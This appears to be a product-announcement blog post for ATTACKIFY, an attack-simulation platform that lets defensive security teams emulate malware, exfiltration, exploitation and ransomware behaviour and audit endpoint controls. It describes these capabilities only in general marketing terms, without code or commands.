It’s been a long time in the works, but we are excited to finally get to a point where we will be officially launching ATTACKIFY soon! That means that there is now an actual website and blog for it and we are busy testing with a small number of close contacts and slowly going to open access to more organizations.
After working within the cyber security industry for a long long time across various disciplines including penetration testing, consulting, security engineering, malware analysis and a whole bunch of other fields…We are happy to get to a point where we are about to release something that we feel addresses an area in cyber security that needs a little more of attention…
ATTACKIFY was initially conceptualized as a way to automate threat simulations when testing and validating security controls by mimicking known bad behaviour seen in malware or attackers. A CISO once asked us,
How do we know our expensive security products will detect the same attack currently happening at Sony?, and with that the very first idea of ATTACKIFY had been thought of and it’s been growing, maturing and re-written a few times and in a direction that we are quite proud of.
Let’s start off with what ATTACKIFY is not:
- Its not a RED TEAM tool for pwnage! - Its not a PENTESTING replacement! - Its not going to POP shells! - Its not using AI or ML or other next-gen buzzwords (we hope) - Its not going to SOLVE all your problems may highlight a few more!
While there is always love for the RED side we didn’t want to build another RED TEAM tool, and it was time to show some more love towards our teams in BLUE for a change. As ATTACKIFY grew through various iterations as a side project for the last 6 years, a few companies launched their attack simulation platforms that have ended up being really expensive and overly complex to run (some of them really good too), we knew that we were headed in the right direction of where we wanted to provide in terms of value, keeping things simple and within budget.
So what is ATTACKIFY then?
At its core ATTACKIFY is a threat or more attack simulation platform with the single goal of helping organisations lift their security posture without breaking the budget! We’re not going to promise crazy things and claim ATTACKIFY does it all and integrates into everything (It doesn’t). We do however want to provide value without the smoke and mirrors, with the functionality that is going to help you and not just add it to pretty looking rich feature list brochure.
With ATTACKIFY you can continuously simulate real world threats within your environment and measure how your security programs respond to specific attacker TECHNIQUES, TACTICS and PROCEDURES (TTPs). There is no need to install any additional servers, obtain a degree on how to use the ATTACKIFY interface, all you need is to run an endpoint agent.
ATTACKIFY enables SECURITY TEAMS to better understand what all these different attacks actually look like that you hear about on the news. ATTACKIFY can help discover where there are potential shortfalls within your current security coverage and how to better DETECT and RESPOND to BREACHES and ALERTS.
...to see through the eyes of an ATTACKER but with the lens of a DEFENDER...
Many organisations don’t often get a second chance to improve their security controls or detection capabilities until it’s too late. In reality many DEFENDERS don’t get exposed to many of the different ATTACKS from adversaries unless it’s during an actual BREACH or RED TEAM exercise. A large organisation with a big security budget may be able to run a few RED TEAM exercises annually but that doesn’t help the BLUE TEAM for the rest of the year and then its even harder for smaller businesses to uplift their security with a small budget and lack of resources.
ATTACKIFY can be seen as your BLUE TEAMS training partner in preparation for ATTACKERS and RED TEAMS by continuously exercising security capabilities year round.
- Simulate malicious software & suspicious user activity - Emulate behaviour related to: - Advanced Persistent Threats - Common Ransomware functionality - Exploitation techniques - Data Exfiltration - Simulate actual techniques & procedures (safely’ish) - Validate and fine tune security controls - Run various Social Engineering attacks - Spear Phishing - End-User Ransomware Social Engineering
What modules can you run?
For public launch there will be about 90 specific modules in the library and this will be updated and added to as new attacks and behaviours are discovered and documented, however, we are not going to INUNDATE you with THOUSANDS of modules, only things that are relevant and add value are going to be added to the library. Also, not every module simulates an attack, ATTACKIFY also contains a number of SECURITY CONTROL modules that can be used to validate endpoint controls and configurations, such as CIS Benchmarks or the ASD Windows Priority Compliance checks.
ATTACKIFY modules have been split into the following categories but not limited to:
The malware modules simulate known malware and it’s common functionality as seen in various samples in the wild. Some of these modules can be used to improve detection of the malware techniques and behaviour on endpoints or over the network as some modules emulate C2 communications with our external C2 simulation servers.
It is important to understand the different channels an attacker can use to exfiltrate data from the internal network externally. Equally it is important to be able to identify the type of data that should or should not be allowed to traverse networks externally so some modules can generate fake HIPPA, PCI, PII and custom data and exfiltrate it to external ATTACKIFY C2’s and test firewall rules and DLP solutions.
Safely run various exploitation techniques related to privilege escalation, process injection, UAC bypasses, process hollowing etc. These modules are not designed to pop shells but to simulate the exploit safely enough to generate enough data to determine if it is successful or not and in some cases at worst, pop calc.exe as SYSTEM as evidence :)
Attackers are always finding ways to bypass execution prevention controls to execute code or commands without alerting or generating logs. Run these actual execution techniques as used in the real world to test security controls and improve detection and logging.
Attackers use a variety of techniques to fingerprint endpoints & better understand the environment they are moving through. From account discovery, domain user and data enumeration to port scanning, use these modules to detect suspicious behaviour on endpoints or across networks.
APT techniques, tactics and procedures are mostly well documented, but they are always changing and improving. These modules emulate the individual APT TTP’s not the entire campaign in a single hit to assist security teams in identifying and understanding each type of activity to help best detect, alert and prevent.
Ransomware is a growing problem more now than ever before, we have a small number of modules (growing) designed to simulate actual behaviour, techniques and process calls to help security teams better understand, detect and prevent outbreaks.
- Security Controls
Attackify has a number of endpoint security control modules designed to audit endpoints according to a number of compliance requirements (CIS Benchmarks), password policies & endpoint exploitability according to Service Pack, Hot fixes and patches installed on endpoints audited against Microsoft Security Bulletin Data.
Is it available?
Not quite yet! However we are working with a few people on this, getting feedback and making adjustments as needed but feel free to get in touch with us if you have an interest in ATTACKIFY.